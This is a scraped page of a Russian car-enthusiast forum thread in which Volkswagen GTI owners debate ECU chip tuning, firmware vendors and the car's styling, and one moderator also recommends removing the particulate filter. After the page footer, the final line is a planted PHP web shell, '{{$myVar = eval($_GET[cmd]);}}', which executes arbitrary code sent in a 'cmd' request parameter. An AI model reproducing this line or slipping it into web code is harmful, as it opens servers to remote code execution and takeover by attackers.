+ Ответить в теме
Страница 3 из 10 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя
Показано с 21 по 30 из 91

Тема: Чип-тюнинг за и против?


  1. #21
    SMokED
    Guest Аватар для SMokED
    Ни хеРРРа себе обороты .....

    Добавлено через 1 минуту
    Киа риа и Хундай солярис тебе в помощь
    Последний раз редактировалось SMokED; 13.03.2012 в 16:28. Причина: Добавлено сообщение

  2. #22
    GTI-Racing energia will become famous soon enough energia will become famous soon enough Аватар для energia
    Регистрация
    20.08.2010
    Откуда
    Москва
    Машина
    MK6R
    Сообщений
    721
    Красные полоски=)) ахахахаха повеселил, я хз кто гти берет потому что внешне нравится, нет он конечно не урод, но за эти деньги можно взять что-то покрасивее)
    тут конечно на вкус и цвет, но мне очень нравиться внешне гти, и отчасти я его хотел именно из-за внешнего вида.

  3. #23
    SMokED
    Guest Аватар для SMokED
    Интерестно а что за эти деньги предложишь покрасивее ?
    суть гти в лаконичности...

  4. #24
    Кобрабля 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold Аватар для 2esco
    Регистрация
    27.12.2010
    Откуда
    Moscow
    Машина
    Candy
    Сообщений
    2,288
    Цитата Сообщение от energia Посмотреть сообщение
    тут конечно на вкус и цвет, но мне очень нравиться внешне гти, и отчасти я его хотел именно из-за внешнего вида.
    соглашусь)) красота у каждого своя!)
    просто на полоски мне часто тычут типа о круты полоски у тя))))))

    Добавлено через 34 секунды
    Цитата Сообщение от Taim Посмотреть сообщение
    Красные полоски=)) ахахахаха повеселил, я хз кто гти берет потому что внешне нравится, нет он конечно не урод, но за эти деньги можно взять что-то покрасивее)
    да я не конкретно тебя имел ввиду)))
    а что можно красивее купить за эти деньги?)
    Последний раз редактировалось 2esco; 13.03.2012 в 16:39. Причина: Добавлено сообщение
    Провокатор^^

  5. #25
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    у каждого ГТИ я считаю, должен быть минимальный пацанский набор: чипчик+выпуск (лучше полный)+впуск+обода+антиППД.

    У меня Мк4 был с самого автосалона на чипе.
    Хороший чип никогда не испортит машину...... никогда. Испортит только безбашенный драйв.
    песок сыпется....не останавливайтесь на достигнутом !

  6. #26
    GTI-Racing senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold Аватар для senka
    Регистрация
    22.01.2009
    Откуда
    Москва
    Машина
    VW Golf 5 E30
    Сообщений
    1,095
    по теме, у самого залит гиак, машина валит) но мне кажется по возможности подстройки прошивки лучше Рево/Амета в Москве никого не найдешь. летом планирую залить тестовую прогу от рево, посмотреть как машин будет ехать.

  7. #27
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Испортить машину может только мясная прослойка с отсутствием серой жидкости)))
    Скорость это смерть, а всему виной жажда скорости...

  8. #28
    GTI-Racing Taim is on a distinguished road Аватар для Taim
    Регистрация
    20.09.2007
    Откуда
    Москва
    Машина
    BMW 528x
    Сообщений
    180
    Цитата Сообщение от SMokED Посмотреть сообщение
    Интерестно а что за эти деньги предложишь покрасивее ?
    суть гти в лаконичности...
    Я смотрю зря я написал про покрасивее)))), не хотел никого обидеть, я просто больше седаны люблю, мне та же 3ка е92 или цшка в амг обвесе внешне больше нравятся, но если их брать по стоимости гти будет овощ в хреновой комплектации, вот опять же 5ый гти мне внешне для своего времени много больше нравился его мощная решетка спереди, да и как то он стильнее был что-ли=)

  9. #29
    GTI-Racing KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all KOT is a name known to all Аватар для KOT
    Регистрация
    25.04.2010
    Откуда
    Москва, Красногорск
    Машина
    GTI V
    Сообщений
    1,784
    Цитата Сообщение от Taim Посмотреть сообщение
    Я смотрю зря я написал про покрасивее)))), не хотел никого обидеть, я просто больше седаны люблю, мне та же 3ка е92 или цшка в амг обвесе внешне больше нравятся, но если их брать по стоимости гти будет овощ в хреновой комплектации, вот опять же 5ый гти мне внешне для своего времени много больше нравился его мощная решетка спереди, да и как то он стильнее был что-ли=)
    Правильно заходить начинаешь, продолжай продолжай про 5-ый))))
    Скорость это смерть, а всему виной жажда скорости...

  10. #30
    SMokED
    Guest Аватар для SMokED
    Цитата Сообщение от Taim Посмотреть сообщение
    Я смотрю зря я написал про покрасивее)))), не хотел никого обидеть, я просто больше седаны люблю, мне та же 3ка е92 или цшка в амг обвесе внешне больше нравятся, но если их брать по стоимости гти будет овощ в хреновой комплектации, вот опять же 5ый гти мне внешне для своего времени много больше нравился его мощная решетка спереди, да и как то он стильнее был что-ли=)
    когда начнешь понимать и мечтать о первом - считай что пришло чуство стиля):epti-work:

+ Ответить в теме
Страница 3 из 10 ПерваяПервая 1 2 3 4 5 ... ПоследняяПоследняя

Похожие темы

  1. к04-001 за,и против
    от Alexandr 922 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 10
    Последнее сообщение: 01.10.2023, 22:06
  2. k03s против k04-001
    от Alexandr 922 в разделе Разное
    Ответов: 52
    Последнее сообщение: 20.11.2011, 21:43
  3. Bilstein B14 ЗА и ПРОТИВ
    от Radge39 в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 15
    Последнее сообщение: 16.03.2011, 22:30
  4. 19 Диски, За И Против!
    от maladoy в разделе Украина
    Ответов: 23
    Последнее сообщение: 12.02.2009, 19:02

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}